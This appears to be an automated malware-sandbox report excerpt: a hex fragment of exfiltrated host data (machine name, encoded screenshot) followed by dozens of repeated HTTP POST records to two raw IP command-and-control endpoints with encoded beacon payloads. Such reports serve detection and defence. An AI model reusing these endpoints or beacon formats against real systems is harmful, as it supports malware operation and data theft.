67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 61 6c 66 6f 6e 73 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 
41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 4b 4e 63 53 55 52 42 56 48 68 65 37 50 31 2f 65 42 7a 33 66 65 42 35 37 68 39 33 74 33 76 6e 5a 35 37 64 6d 39 76 62 33 64 6c 6e 62 37 6d 36 33 5a 32 39 33 4d 37 74 62 76 59 77 73 35 37 6c 2f 76 41 6f 48 74 73 38 61 31 65 30 4d 78 6b 34 6b 59 53 4d 6e 46 43 32 4d 34 77 63 6d 35 62 74 51 46 46 69 4a 4a 62 43 53 4c 49 74 78 54 4b 63 52 4d 4c 45 69 65 69 78 45 6c 69 79 41 74 6b 5a 67 34 6b 74 57 42 61 44 53 45 34 67 55 68 59 6b 57 59 52 2b 67 70 5a 6f 79 42 51 46 6b 52 4c 42 58 2f 70 63 66 61 75 71 67 65 35 47 6f 51 43 51 41 49 6c 75 76 74 37 50 38 35 6f 49 36 4f 37 71 71 75 71 47 35 50 70 4d 56 66 65 2f 46 5a 49 6b 53 5a 49 6b 53 5a 4b 36 4e 67 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 73 7a 41 4a 51 6b 53 5a 49 6b 53 5a 4b 36 4f 41 4e 41 53 5a 49 6b 53 5a 49 6b 71 59 7
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
